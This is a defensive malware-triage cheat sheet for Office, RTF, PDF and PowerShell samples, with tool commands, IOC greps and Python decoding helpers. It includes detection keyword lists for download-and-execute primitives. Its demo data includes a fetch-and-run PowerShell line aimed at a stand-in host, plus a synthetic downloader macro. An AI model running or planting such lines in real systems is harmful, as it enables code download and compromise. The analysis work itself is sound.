file::analysis

dfir file triage PE · ELF · scripts
01 Initial Triage
Baseline commands
# Never execute first. Start with identity + metadata.
sha256sum sample
file sample
stat sample
exiftool sample
strings -n 6 sample | less
strings -el sample | less   # UTF-16LE / wide strings
binwalk sample
ent sample                      # quick entropy signal

# Fast grep for obvious indicators
strings sample | grep -iE "http|powershell|cmd\.exe|rundll32|regsvr32|FromBase64String|URLDownloadToFile|flag"
strings -el sample | grep -iE "powershell|http|\.exe|\.dll|Enable-Macros"
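The identity and entropy steps above can also be scripted when a sample has to be triaged without executing anything. The following is a minimal sketch, not a replacement for `sha256sum` or `ent`; the function names are illustrative and the entropy value is plain Shannon entropy over byte frequencies.

```python
import hashlib
import math
from collections import Counter


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of the raw bytes (the same digest sha256sum prints)."""
    return hashlib.sha256(data).hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 (constant) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


# Tiny in-memory demo: constant data vs. every byte value exactly once.
low = shannon_entropy(b"\x00" * 64)
high = shannon_entropy(bytes(range(256)))
print(f"constant={low:.1f} uniform={high:.1f}")
```

To use it on a file, read the sample with `open(path, "rb").read()` and pass the bytes in. Values close to 8 bits per byte usually point at packed, encrypted, or compressed content, but that signal alone is weak.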
What you are trying to answer
# Questions to answer before deeper analysis
- What is the real file type?
- Is it a container? (zip / OOXML / PDF with embedded file)
- Is there scripting? (VBA / JS / PowerShell)
- Is there obfuscation? (base64 / hex / XOR / compression)
- Is there an execution trigger?
  - Office: AutoOpen / Document_Open / Workbook_Open
  - PDF: /OpenAction / /AA / JavaScript / Launch
- Are there remote references?
  - URL / UNC path / template injection / remote object
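The first question, the real file type, can be answered from magic bytes regardless of the extension. The sketch below is a hedged illustration: the `MAGICS` table and the `sniff` name are assumptions made for this example, the list is far from complete, and `file` remains the better tool.

```python
# (magic prefix, label) pairs for the file families this sheet covers.
MAGICS = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),  # legacy .doc/.xls/.ppt (OLE / CFBF)
    (b"PK\x03\x04", "zip"),                         # OOXML and other zip containers
    (b"%PDF-", "pdf"),
    (b"{\\rt", "rtf"),                              # "{\rt" prefix, as in "{\rtf1"
    (b"MZ", "mz"),                                  # DOS/PE executable header
    (b"\x7fELF", "elf"),
]


def sniff(data: bytes) -> str:
    """Return a coarse type label based on leading bytes only."""
    head = data[:1024]
    for magic, label in MAGICS:
        if head.startswith(magic):
            return label
    # Some PDF readers accept a header that is not at offset 0,
    # so also look for it inside the first 1024 bytes.
    if b"%PDF-" in head:
        return "pdf"
    return "unknown"


print(sniff(b"PK\x03\x04..."), sniff(b"junk\n%PDF-1.7"))
```

A `zip` result for a file named `.docx` is expected; a `zip` or `mz` result for a file named `.pdf` is the kind of mismatch worth noting before going deeper.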
Red flags
High entropy                 → packed / encrypted / compressed blob
Wide strings only            → often PowerShell / Windows-centric sample
Office file with macros      → go straight to oletools
PDF with /JS /Launch         → suspicious interaction or exploit path
External template / remote URL → staging or lure document
Many object streams          → PDF object hiding / obfuscation
Base64 in wide strings       → often EncodedCommand or staged script
02 Office Documents
Identify the Office family
# Modern Office = OOXML zip container
.docx / .xlsx / .pptx  → ZIP-based XML package
.docm / .xlsm / .pptm  → ZIP-based + macros allowed

# Legacy Office = OLE compound document
.doc / .xls / .ppt      → OLE / CFBF

# Quick identification
file invoice.docm
oleid invoice.docm
zipinfo invoice.docm           # OOXML internals if zip-based
7z l invoice.docm              # list contents safely
OOXML internals to inspect
# Unpack to inspect XML relationships and embeds
mkdir oo && 7z x sample.docm -ooo     # -o<dir> takes no space: unpack into ./oo
find oo -maxdepth 3 -type f | sort

# Interesting files / paths
[Content_Types].xml
_rels/.rels
word/document.xml
word/_rels/document.xml.rels
word/vbaProject.bin          # macros
word/embeddings/             # embedded OLE / package
word/media/                  # images / possible lure
customXml/                   # staging / hidden data sometimes

# Search relationships / URLs / template injection
grep -RniE 'http|mhtml|file://|\\\\|template|oleObject|external' oo/
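The relationship search can be made more precise by parsing the `.rels` parts and keeping only entries marked `TargetMode="External"`, which is where remote templates and remote objects show up. This is a sketch under assumptions: the function name is illustrative, the demo package is synthetic, and the standard-library XML parser is not hardened against hostile XML, so run it only in the analysis VM.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by OPC relationship parts (*.rels).
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_relationships(path_or_file):
    """Yield (rels part, relationship kind, target) for external targets."""
    with zipfile.ZipFile(path_or_file) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    yield name, kind, rel.get("Target", "")


# Synthetic demo package built in memory (no real document involved).
_rels = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/'
    '2006/relationships/attachedTemplate" Target="http://example.test/t.dotm" '
    'TargetMode="External"/>'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/'
    '2006/relationships/styles" Target="styles.xml"/>'
    "</Relationships>"
)
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("word/_rels/settings.xml.rels", _rels)
_buf.seek(0)
found = list(external_relationships(_buf))
print(found)
```

An `attachedTemplate` relationship with an external `http://` or UNC target is the classic template-injection pattern; ordinary hyperlinks also appear as external relationships, so review the kind before drawing conclusions.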
Legacy OLE docs
oleid sample.doc
oledump.py sample.doc
oledump.py -i sample.doc      # extra info on macro streams (compiled vs. source size)
olemeta sample.doc

# Common suspicious streams
Macros / VBA
ObjectPool
Ole10Native                  # dropped file / embedded package
\x01CompObj / \x05SummaryInformation   # standard metadata streams

# Extract embedded data / stream
oledump.py -s 8 -d sample.doc > stream.bin
03 Macros, DDE & Office-Specific TTPs
Oletools workflow
oleid sample.docm             # macro / encrypted / external refs
olevba sample.docm            # dump VBA, compressed streams
olevba --decode sample.docm  # decode VBA strings
mraptor sample.docm           # macro suspicion scoring
msodde sample.doc            # DDE abuse detection

# Search for execution primitives
olevba sample.docm | grep -iE "AutoOpen|Document_Open|Workbook_Open|Shell|CreateObject|WScript\.Shell|PowerShell|cmd\.exe|URLDownloadToFile|XMLHTTP|ADODB\.Stream"
What to look for in macros
# Typical malicious flow
1. Auto* trigger
2. String building / obfuscation
3. Decode blob (base64 / hex / split chars)
4. Write file (ADODB.Stream)
5. Execute via Shell / WMI / rundll32 / regsvr32 / PowerShell

# Suspicious keywords
CreateObject
GetObject
Shell
WScript.Shell
MSXML2.XMLHTTP
WinHttp.WinHttpRequest
ADODB.Stream
Environ
Chr / Asc / StrReverse / Replace / Split
FromBase64String / Base64Decode

# Template injection / remote object clues
attachedTemplate
mhtml:
http://
https://
\\server\share\template.dotm
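Once `olevba` has dumped the VBA source, the keyword list above can be mapped onto the stages of the typical flow to see how much of the chain is present. The sketch below is illustrative only: the stage names (including a separate `fetch` group) and the `macro_stages` function are assumptions for this example, and a keyword hit is a lead to read the code, not a verdict.

```python
import re

# Keywords from this sheet, grouped by the stage they usually belong to.
STAGES = {
    "trigger": r"\b(AutoOpen|Document_Open|Workbook_Open)\b",
    "obfuscation": r"\b(Chr|Asc|StrReverse|Replace|Split)\s*\(",
    "decode": r"FromBase64String|Base64Decode",
    "fetch": r"MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile",
    "write": r"ADODB\.Stream",
    "execute": r"\b(Shell|WScript\.Shell|rundll32|regsvr32|powershell)\b",
}


def macro_stages(vba_source: str) -> dict:
    """Map stage name -> sorted lowercase keywords found in the source."""
    hits = {}
    for stage, pattern in STAGES.items():
        found = {
            m.group(0).rstrip("( ").lower()
            for m in re.finditer(pattern, vba_source, re.IGNORECASE)
        }
        if found:
            hits[stage] = sorted(found)
    return hits


# Synthetic macro text for demonstration.
sample_vba = '''Sub AutoOpen()
    u = StrReverse("exe.a/tset.elpmaxe//:ptth")
    Set h = CreateObject("MSXML2.XMLHTTP")
    Set s = CreateObject("ADODB.Stream")
    Shell "cmd.exe /c " & p
End Sub'''
stage_hits = macro_stages(sample_vba)
print(stage_hits)
```

A sample that hits trigger, fetch, write, and execute together matches the downloader pattern described above much more strongly than any single keyword.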
RTF / lure document notes
# RTF can carry embedded OLE / exploit markers
file sample.rtf
rtfobj sample.rtf
strings sample.rtf | grep -iE "objdata|objclass|equation|ole2link|powershell|cmd"

# Save every embedded object, then carve what was saved
rtfobj -s all sample.rtf
foremost -i extracted.bin -o out/

# Phishing-ish signs
- fake invoice / shipping theme
- images urging "Enable Content"
- tiny / hidden OLE object
- one-stage downloader macro
04 PDF Analysis
Fast PDF triage
pdfid.py sample.pdf
pdf-parser.py -a sample.pdf
peepdf -f sample.pdf
pdfinfo sample.pdf
qpdf --check sample.pdf

# pdfid flags that deserve attention
/JS /JavaScript
/OpenAction
/AA
/Launch
/EmbeddedFile
/ObjStm
/XFA
/RichMedia
/AcroForm
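PDF names can be written with `#xx` hex escapes (for example `/J#61vaScript`), so a plain text search can miss the flags listed above. The sketch below shows one way to count them after normalizing the escapes. It is a simplified illustration with assumed names; it only sees names in the uncompressed part of the file, so anything inside `/ObjStm` or other compressed streams still needs `pdf-parser.py`.

```python
import re

KEYWORDS = ["/JS", "/JavaScript", "/OpenAction", "/AA", "/Launch",
            "/EmbeddedFile", "/ObjStm", "/XFA", "/RichMedia", "/AcroForm"]

# A name token: "/" followed by characters that are neither whitespace
# nor PDF delimiters.
_NAME = re.compile(rb"/[^\s/<>\[\]()%{}]+")
_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_name(token: bytes) -> str:
    """Undo #xx escapes so /J#61vaScript compares equal to /JavaScript."""
    plain = _HEX.sub(lambda m: bytes([int(m.group(1), 16)]), token)
    return plain.decode("latin-1")


def count_keywords(data: bytes) -> dict:
    """Count occurrences of the watched names in raw PDF bytes."""
    counts = dict.fromkeys(KEYWORDS, 0)
    for m in _NAME.finditer(data):
        name = normalize_name(m.group(0))
        if name in counts:
            counts[name] += 1
    return counts


# Synthetic fragment with one hex-escaped name.
demo_pdf = (b"<< /Type /Catalog /OpenAction 5 0 R >>\n"
            b"<< /S /J#61vaScript /JS (app.alert(1)) >>")
pdf_counts = count_keywords(demo_pdf)
print({k: v for k, v in pdf_counts.items() if v})
```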
Object inspection with pdf-parser
# Overview + suspicious objects
pdf-parser.py -a sample.pdf
pdf-parser.py --search javascript sample.pdf
pdf-parser.py --search OpenAction sample.pdf
pdf-parser.py --search EmbeddedFile sample.pdf

# Inspect one object and decode streams
pdf-parser.py -o 12 sample.pdf
pdf-parser.py -o 12 -f sample.pdf         # apply filters
pdf-parser.py -o 12 -w sample.pdf         # dump raw stream
pdf-parser.py -o 12 -d obj12.bin sample.pdf
What specifically to inspect
# Common malicious / suspicious features
/OpenAction                  # auto action on open
/AA                          # additional actions
/JS /JavaScript              # embedded JS
/Launch                      # command or file launch
/EmbeddedFile                # dropped content / lure
/ObjStm                      # object streams hide objects
/XFA                         # interactive forms, often abused
/URI                         # external URL
/SubmitForm                  # exfil / callback possibility

# Quick grep after dumping
strings sample.pdf | grep -iE "/JS|/OpenAction|http|cmd|powershell|launch|uri"
Embedded files & attachments
# mutool inspects objects; pdfdetach handles attachments
mutool show sample.pdf trailer
mutool show sample.pdf 12
mutool extract sample.pdf     # extracts embedded fonts / images, not attachments
pdfdetach -list sample.pdf
mkdir -p extracted && pdfdetach -saveall -o extracted/ sample.pdf

# Then triage extracted payloads
file extracted/*
sha256sum extracted/*
oledump.py suspicious.bin      # if extracted object is OLE
JavaScript in PDF
# Dump JS-ish streams and beautify
pdf-parser.py --search /JS sample.pdf
pdf-parser.py -o 23 -f -d js23.bin sample.pdf
js-beautify js23.bin > js23.pretty.js

# Things to search for
app.launchURL
this.submitForm
exportDataObject
util.printf
unescape
fromCharCode
replace / split / reverse
heap spraying patterns

# PDFs also hide data in encoded streams
FlateDecode
ASCIIHexDecode
ASCII85Decode
RunLengthDecode
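When a raw stream has been dumped without filters applied, the four encodings above can be undone by hand in the order the `/Filter` array lists them. The following is a minimal sketch with assumed helper names; it ignores `/DecodeParms` (predictors and similar), which `pdf-parser.py -f` handles better.

```python
import base64
import re
import zlib


def flate(data: bytes) -> bytes:
    return zlib.decompress(data)


def ascii_hex(data: bytes) -> bytes:
    # ">" marks end of data; whitespace between digits is ignored.
    digits = re.sub(rb"\s", b"", data.split(b">", 1)[0])
    if len(digits) % 2:
        digits += b"0"  # an odd final digit is treated as if followed by 0
    return bytes.fromhex(digits.decode("ascii"))


def ascii85(data: bytes) -> bytes:
    body = data.strip()
    if body.startswith(b"<~"):
        body = body[2:]
    body = body.split(b"~>", 1)[0]  # "~>" marks end of data
    return base64.a85decode(body)


def run_length(data: bytes) -> bytes:
    out, i = bytearray(), 0
    while i < len(data):
        n = data[i]
        if n == 128:                      # end-of-data marker
            break
        if n < 128:                       # copy the next n + 1 bytes literally
            out += data[i + 1:i + 2 + n]
            i += n + 2
        else:                             # repeat the next byte 257 - n times
            out += data[i + 1:i + 2] * (257 - n)
            i += 2
    return bytes(out)


DECODERS = {"FlateDecode": flate, "ASCIIHexDecode": ascii_hex,
            "ASCII85Decode": ascii85, "RunLengthDecode": run_length}


def decode_stream(data: bytes, filters: list) -> bytes:
    """Apply the filters in the order given by the /Filter array."""
    for name in filters:
        data = DECODERS[name](data)
    return data


# Synthetic round trip: Flate-compressed JS wrapped in ASCII85.
_js = b"app.launchURL('http://example.test')"
_encoded = base64.a85encode(zlib.compress(_js)) + b"~>"
print(decode_stream(_encoded, ["ASCII85Decode", "FlateDecode"]))
```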
Practical PDF workflow
pdfid.py sample.pdf
pdf-parser.py -a sample.pdf
pdf-parser.py --search OpenAction sample.pdf
pdf-parser.py --search JS sample.pdf
pdfdetach -saveall sample.pdf
mutool extract sample.pdf
strings sample.pdf | grep -iE "http|powershell|cmd|OpenAction|Launch"

# If JS or embedded file appears, pivot to that artifact
05 Encoded PowerShell & Obfuscated Script Recovery
Find PowerShell hidden in files
strings sample | grep -i powershell
strings -el sample | grep -i powershell
grep -aoiE -e "-enc|-encodedcommand|FromBase64String|IEX|Invoke-Expression" sample   # -e stops grep reading the pattern as options

# Wide / OOXML / macro outputs often contain UTF-16LE text
strings -el sample | grep -iE "FromBase64String|New-Object|DownloadString|WebClient|Invoke-Expression"
Decode common EncodedCommand
# PowerShell -enc is usually UTF-16LE bytes then base64
echo 'BASE64_HERE' | base64 -d | iconv -f UTF-16LE -t UTF-8

# Save from strings output and decode
tr -d '\r\n' < blob.b64 | base64 -d | iconv -f UTF-16LE -t UTF-8

# If not UTF-16LE, try raw UTF-8
echo 'BASE64_HERE' | base64 -d
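The same decode, including the UTF-16LE versus UTF-8 fallback, can be wrapped in one helper. This is a sketch rather than a definitive decoder: the function name is illustrative, and the encoding check is a simple heuristic (ASCII text stored as UTF-16LE has a NUL in every second byte).

```python
import base64


def decode_encoded_command(b64_text: str) -> str:
    """Decode a PowerShell -enc blob, guessing UTF-16LE vs. UTF-8."""
    compact = "".join(b64_text.split())        # drop line breaks and spaces
    compact += "=" * (-len(compact) % 4)       # restore stripped padding
    raw = base64.b64decode(compact)
    nul_in_odd_positions = raw[1::2].count(0)
    # Heuristic: at least half of the odd-indexed bytes are NUL.
    if len(raw) % 2 == 0 and nul_in_odd_positions * 2 >= len(raw) // 2:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


# Synthetic example: encode a command the way -EncodedCommand expects it.
_cmd = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
_blob = base64.b64encode(_cmd.encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(_blob))
```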
Typical script deobfuscation steps
# Common stages
- Join split strings
- Replace [char] / Chr() sequences
- Decode base64 / hex
- Reverse strings
- Gzip / Deflate decompress
- Find final command or URL

# Useful patterns to grep
FromBase64String
GZipStream
DeflateStream
IEX
DownloadString
Invoke-WebRequest
Start-BitsTransfer
Reflection.Assembly

# If script is one line, reformat before reasoning
sed 's/;/;\n/g' script.ps1 | less
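Two of the stages above, replacing `[char]` casts and joining split strings, are mechanical enough to script before reading the code. The sketch below uses assumed helper names and handles only single-quoted literals joined with `+`; it will not cope with escaped quotes, format operators, or variables.

```python
import re


def resolve_char_casts(text: str) -> str:
    """Rewrite [char]72 or [char]0x48 as the quoted literal 'H'."""
    def repl(match):
        token = match.group(1)
        code = int(token, 16) if token.lower().startswith("0x") else int(token)
        return "'" + chr(code) + "'"
    return re.sub(r"\[char\]\s*(0x[0-9a-f]+|\d+)", repl, text, flags=re.IGNORECASE)


def join_literals(text: str) -> str:
    """Collapse 'Down'+'load' into 'Download', repeating until stable."""
    pattern = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    previous = None
    while previous != text:
        previous = text
        text = pattern.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


# Synthetic obfuscated fragment.
obfuscated = "&([char]105+[char]0x65+'x') ('Down'+'load'+'String')"
cleaned = join_literals(resolve_char_casts(obfuscated))
print(cleaned)
```

Run the cast replacement first so that the characters it produces can take part in the join pass.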
06 Extraction, Decode & Unpack
Archives / containers
7z l sample
7z x sample
unzip -l sample.zip
tar -tf sample.tar
cabextract sample.cab
Carving / embedded content
binwalk -e sample
foremost -i sample -o carve/
bulk_extractor -o bulk/ sample
Encodings
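base64 -d                      # stdin: base64 text → raw bytes
xxd -r -p                      # stdin: plain hex → raw bytes
python3 -c "import zlib,sys;sys.stdout.buffer.write(zlib.decompress(sys.stdin.buffer.read()))"   # stdin: zlib stream → raw bytes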
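Blobs are often layered, for example base64 around gzip or raw deflate, and `zlib.decompress` with default settings only accepts the zlib wrapper. The sketch below tries the three common wrappers in turn; the `inflate` and `unwrap` names are illustrative, and the hex-before-base64 order is a design choice made here because every hex string is also valid base64.

```python
import base64
import zlib


def inflate(data: bytes) -> bytes:
    """Try zlib, then gzip, then raw deflate (no header, as .NET DeflateStream writes)."""
    for wbits in (zlib.MAX_WBITS, zlib.MAX_WBITS | 16, -zlib.MAX_WBITS):
        try:
            return zlib.decompress(data, wbits=wbits)
        except zlib.error:
            continue
    raise ValueError("not zlib / gzip / raw deflate")


def unwrap(text: str) -> bytes:
    """Decode hex or base64 text, then decompress if the result is compressed."""
    compact = "".join(text.split())
    try:
        raw = bytes.fromhex(compact)
    except ValueError:
        raw = base64.b64decode(compact, validate=True)
    try:
        return inflate(raw)
    except ValueError:
        return raw  # decoded, but not compressed


# Synthetic example: base64 over raw deflate.
_payload = b"powershell -nop -w hidden"
_c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
_raw_deflate = _c.compress(_payload) + _c.flush()
print(unwrap(base64.b64encode(_raw_deflate).decode("ascii")))
```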
07 IOC Hunting & Pivots
Useful greps
strings sample | grep -E 'https?://|\\\\[A-Za-z0-9._$-]+\\|[0-9]{1,3}(\.[0-9]{1,3}){3}'   # single quotes keep \\ and $- away from the shell
strings sample | grep -iE "user-agent|cookie|api|token|cmd|rundll32|schtasks|reg add|mshta|wscript|cscript"
strings -el sample | grep -iE "http|powershell|download|template|payload|dll"
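The greps above run once over narrow strings and once over wide strings. A script can do both passes in one go by scanning the raw bytes and, separately, each UTF-16LE text run collapsed to single-byte text. The sketch below is illustrative: the regexes are deliberately loose, the function names are assumptions, and results still need manual review.

```python
import re

URL = re.compile(rb"https?://[^\s\"'<>)\x00]+", re.IGNORECASE)
IPV4 = re.compile(rb"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
UNC = re.compile(rb"\\\\[A-Za-z0-9._$-]+\\[^\s\"'<>\x00]+")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")   # 6+ UTF-16LE ASCII chars


def views(data: bytes):
    """Yield the raw bytes, then each wide-string run as narrow text."""
    yield data
    for match in WIDE_RUN.finditer(data):
        yield match.group(0)[::2]


def extract_iocs(data: bytes) -> dict:
    urls, ips, unc = set(), set(), set()
    for view in views(data):
        urls.update(u.decode("latin-1") for u in URL.findall(view))
        unc.update(p.decode("latin-1") for p in UNC.findall(view))
        for candidate in IPV4.findall(view):
            # Reject dotted numbers whose octets exceed 255.
            if all(int(octet) <= 255 for octet in candidate.split(b".")):
                ips.add(candidate.decode("ascii"))
    return {"urls": sorted(urls), "ipv4": sorted(ips), "unc": sorted(unc)}


# Synthetic blob: one narrow URL, one wide UNC path, one invalid "IP".
_blob = (b"junk http://example.test/a.ps1\n"
         + "\\\\10.0.0.5\\share\\t.dotm".encode("utf-16-le")
         + b"\x00\x00 999.1.1.1")
iocs = extract_iocs(_blob)
print(iocs)
```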
YARA / signatures
yara rules.yar sample
yara -r rules/ sample_dir/

# Good pivot targets for YARA later
URLs / domains
macro keywords
PDF JavaScript API names
PowerShell decode primitives
known mutex / paths / strings
Section-wise interpretation
# High confidence suspicious combinations
Office macro + AutoOpen + URLDownloadToFile
PDF /OpenAction + /JS + /EmbeddedFile
Wide strings + -enc + FromBase64String
OOXML relationship to remote template
RTF with embedded OLE + powershell strings

# Low confidence alone
High entropy only
Long base64 only
External URL only
One suspicious keyword only
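The distinction above, combinations versus single signals, can be encoded as a small lookup so that triage notes stay consistent between analysts. This is only a sketch: the indicator tag names are hypothetical labels invented for this example, and the two-level result is a simplification of analyst judgment.

```python
# Each set is one high-confidence combination from the list above.
# Tag names are hypothetical; use whatever labels your notes already use.
HIGH_COMBOS = [
    {"office_macro", "auto_open", "url_download"},
    {"pdf_openaction", "pdf_js", "pdf_embedded_file"},
    {"wide_strings", "enc_flag", "from_base64"},
    {"ooxml_remote_template"},
    {"rtf_ole", "powershell_strings"},
]


def confidence(indicators: set) -> str:
    """Return 'high' if any full combination is present, else 'low' or 'none'."""
    if any(combo <= indicators for combo in HIGH_COMBOS):
        return "high"
    return "low" if indicators else "none"


print(confidence({"office_macro", "auto_open", "url_download", "high_entropy"}))
print(confidence({"high_entropy", "long_base64"}))
```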
08 Safe Dynamic Checks (Lab Only)
Minimal safe dynamic approach
# Use a disposable VM snapshot, no production system
- snapshot first
- disable shared folders
- isolate network or use controlled gateway
- record hashes before / after
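Recording hashes before and after a run is easy to automate for a watched directory inside the lab VM. The sketch below hashes every file under a root and reports what was added, removed, or changed; the function names are illustrative and the demo uses a throwaway temporary directory instead of a real sample run.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(root) -> dict:
    """Map relative file path -> SHA-256 for every file under root."""
    root = Path(root)
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            result[str(path.relative_to(root))] = digest
    return result


def diff(before: dict, after: dict) -> dict:
    """Compare two snapshots taken with snapshot()."""
    shared = before.keys() & after.keys()
    return {
        "added": sorted(after.keys() - before.keys()),
        "removed": sorted(before.keys() - after.keys()),
        "changed": sorted(k for k in shared if before[k] != after[k]),
    }


# Demo: simulate a run that modifies one file and drops another.
with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp)
    (base / "a.txt").write_text("one")
    first = snapshot(base)
    (base / "a.txt").write_text("two")
    (base / "dropped.bin").write_bytes(b"MZ")
    report = diff(first, snapshot(base))
print(report)
```

Take the first snapshot right after reverting to the clean VM snapshot, and the second after the sample has run, so that unrelated system activity stays out of the diff as far as possible.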

# Linux payloads
strace -f -o strace.log ./sample
ltrace -o ltrace.log ./sample

# Document-focused dynamic checks belong in Windows lab, not REMnux
- open suspicious Office/PDF only in disposable VM
- capture process tree, file writes, net connections
REMnux-friendly pivot tools
inetsim                    # fake services / sinkhole
tcpdump -i any -w run.pcap
fakenet-ng                 # if available in your lab workflow
python3 -m http.server 8000 # simple callback sink only

# Dynamic analysis goals
- confirm URL / C2 path
- confirm dropped file names
- confirm exact PowerShell line
- confirm persistence attempt
09 Practical Workflow
Suspicious file playbook
# 1. Identify
sha256sum sample
file sample
exiftool sample
strings -n 6 sample | less
strings -el sample | less

# 2. Branch on file type
Office → oleid / olevba / oledump.py / unzip OOXML
PDF    → pdfid.py / pdf-parser.py / peepdf / pdfdetach
Archive → 7z / binwalk / foremost

# 3. Recover logic
Find macros / JS / EncodedCommand / URLs / embedded files
Decode base64 / UTF-16LE / compressed blobs

# 4. Pivot
Extract payloads → analyze them as new samples
Build IOC list: URLs, domains, hashes, file names, commands

# 5. Only then consider controlled dynamic analysis
REMnux note: Use REMnux for safe static triage and extraction. Open live Office or PDF payloads only inside a disposable, isolated Windows VM when you need behavior confirmation.